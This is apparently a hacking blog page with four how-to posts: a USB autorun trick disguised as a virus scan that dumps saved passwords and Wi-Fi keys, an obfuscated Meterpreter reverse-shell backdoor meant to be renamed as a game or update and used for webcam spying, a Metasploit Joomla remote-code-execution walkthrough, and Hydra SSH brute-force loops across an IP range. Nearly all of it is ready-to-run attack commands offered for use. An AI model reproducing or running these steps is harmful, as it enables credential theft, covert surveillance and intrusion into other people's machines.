Vannakk.net: Hacking

Showing posts with label Hacking. Show all posts

Thursday, April 28, 2016

Hack - By Using USB

1. Create autorun.inf

With content:

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

2. Create file name: launch.bat

with content:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start chromepass.exe /stext chromepass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

3. Go to http://nirsoft.net/utils/, and Download all the 7 tools or more as you need put into USB.

Once you plug that USB to windows PC (XP, Vista and Windows 7), It will collect all the password info and put into the TXT file as above.

Tuesday, April 26, 2016

Kali IP: 192.168.137.173
Victim IP: 192.168.137.1

1. Create a Backdoor
In Kali Open a Terminal and run this command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.173 lport=4444 -e cmd/powershell_base64 -i 5 -f exe > /root/Desktop/backdoorr.exe

2. Start Metasploit Console
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.137.173
set lport 4444
exploit

3. Send the Backdoorr.exe to the Windows PC
Use your own style to make the Windows machine to execute your file.

Hint, you can rename to, new-game.exe, SreySarArt.exe or update.exe

Once user on Windows PC execute the file you will got 1 session opened.

OK, Enjoy.. with other things,
screenshot

webcam_list
webcam_snap
webcam_stream

Related to the above picture if you want to view the camera,

Open a browser with URL: file:///root/aPnewzuW.html

OK, Done,

#Vannakk #Hacking #Windows-8-8.1 #Kali

Sunday, April 24, 2016

Hack Joomla

Victim Server IP: 124.124.124.178

Exploit Joomla Shell Upload RCE-CVE-2015-8562

All versions of the Joomla! below 3.4.6 are known to be vulnerable.

But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.

######################################################################

## VM Joomla Lab For Testing, Download from:

## https://www.dropbox.com/s/otcizorzqilvjll/Joomla_VM.rar?dl=0

######################################################################

User: joomla

Pass: joomla

Switch to user "root"

sudo su

(Enter user joomla's password)

# Information Gathering:

http://124.124.124.178/joomla/administrator

admin/admin (if you want test login)

# Finding out the Joomla version:

http://124.124.124.178/joomla/language/en-GB/en-GB.xml

#Metasploit has got a scanner to find this. We can use that as well.

#Start Metasploit,

msfconsole

use exploit/multi/http/joomla_http_header_rce

set PAYLOAD php/meterpreter/bind_tcp

set RHOST 124.124.124.178

set TARGETURI /joomla/

exploit

#Vannakk #Joomla

Monday, March 28, 2016

Hydra - Commands

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT ] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Sample 1: Log in with user: root from the random password file

#!/bin/bash

for i in 124.124.124.{167..205}

hydra $i ssh -l root -P top50.txt -s 22 -vV

done

Sample2: Log in with the random users and passwords from file

#!/bin/bash

for i in 124.124.124.{167..205}

hydra -L /opt/hydra/users.txt -P /opt/hydra/passwords.txt -e ns -v -o /opt/hydra/hashcrack-ssh.txt $i ssh

done

Ok, Let go on more.

Vannakk.net

Pages